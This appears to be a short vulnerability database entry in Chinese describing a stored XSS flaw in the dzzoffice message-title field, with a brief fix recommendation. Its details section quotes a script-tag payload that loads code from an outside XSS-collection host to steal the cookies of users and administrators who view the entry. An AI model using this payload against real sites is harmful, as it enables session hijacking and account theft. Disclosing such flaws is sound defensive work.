|dzzoffice 信息标题处存储型XSS漏洞 - VULHUB开源网络安全威胁库

dzzoffice 信息标题处存储型XSS漏洞

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

###0x01漏洞简介 dzzoffice存储型XSs一枚盲打后台可打cookie ###0x02漏洞详情点桌面的信息新建 ![](https://images.seebug.org/contribute/14a4e47c-a915-4aff-a07c-bf6430cc9dbf) 在信息标题处插入代码可触发调用xss平台插入<script src=http://xxs.la/AgNpO2></script> 只要用户访问就可以打到他cookie了 ![](https://images.seebug.org/contribute/de18a54d-3ce4-4488-98a8-c2ead97c8bc4) ![](https://images.seebug.org/contribute/093c8f5e-796b-4096-a247-a84590120328) ![](https://images.seebug.org/contribute/191a3987-b410-4886-80b7-ba008dfc4a7b) ###0x03修复方案过滤，进行html处理。

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™